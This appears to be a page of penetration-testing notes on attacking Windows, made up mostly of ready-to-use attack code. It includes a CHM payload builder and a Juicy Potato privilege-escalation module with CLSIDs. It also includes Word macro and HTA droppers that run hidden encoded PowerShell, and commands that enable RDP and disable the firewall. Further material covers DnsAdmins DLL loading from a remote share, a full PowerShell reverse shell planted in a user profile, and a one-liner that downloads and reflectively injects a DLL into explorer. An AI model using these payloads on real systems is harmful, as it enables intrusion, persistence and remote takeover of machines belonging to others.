Comment on page
Windows
Use a Windows VM, install the required tools from here, then get the scricpt Out-CHM.ps1 and create your payload:
Out-CHM -Payload C:\Windows\System32\spool\drivers\color\nc.exe -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
use windows/local/ms16_075_reflection_juicy`
set SESSION <>
set CLSID <>
Common CLSIDs for the exploit are:
- {e60687f7-01a1-40aa-86ac-db1cbf673334}
- {752073A1-23F2-4396-85F0-8FDB879ED0ED}
- {3c6859ce-230b-48a4-be6c-932c0c202048}
- {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
- {8F5DF053-3013-4dd8-B5F4-88214E81C0CF}
Simple Word Macro (View > Macros, at the end "File->Information->Check For Issues" to purge personal details), save as .doc:
Sub DoStuff()
Dim wsh As Object
Set wsh = CreateObject("WScript.Shell")
wsh.Run "<powershell command here>"
Set wsh = Nothing
End Sub
Sub AutoOpen()
DoStuff
End Sub
Alternativly we can use HTA:
<script language="VBScript">
Function DoStuff()
Dim wsh
Set wsh = CreateObject("Wscript.Shell")
wsh.run "powershell -Sta -Nop -Window Hidden -EncodedCommand <blah>"
Set wsh = Nothing
End Function
DoStuff
self.close
</script>
Use wix to generate msi files from xml or to manipulate existing msi files. A complete example can be seen in the Ethereal Writeup
netsh advfirewall firewall show rule name=all
Reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`
netsh Advfirewall set allprofiles state off
To run commands with runas, the user has to have logged in at least once.
# requires RSAT
dnscmd <dc> /config /serverlevelplugindll \\<ip>\<dll>
# requires RSAT
$dnssettings = Get-DnsServerSetting -ComputerName <dc> -Verbose
$dnssettings.ServerLevelPluginDll = "\\<ip>\<dll>"
Set-DnsServerSetting -InputObject $dnssettings -ComputerName <dc> -Verbose
Then restart the service:
sc.exe stop dns
sc.exe start dns
Read File:
${C:\file.txt}
Write File:
${C:\file.txt} = 'content'
Break out by writing a powershell profile (executed whenever powershell is started by this user):
${C:\users\<user>\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1} = '$client = New-Object System.Net.Sockets.TCPClient("<ip>",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
Via Script Blocks:
& { ls }
Custom function:
PS>function xct { ls };
PS>xct
...
These vulnerabilities exist only in Constrained Language Mode, usually with JEA "NoLanguage" is to be used.
String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://<ip>/payload.dll');(New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";
Last modified 9mo ago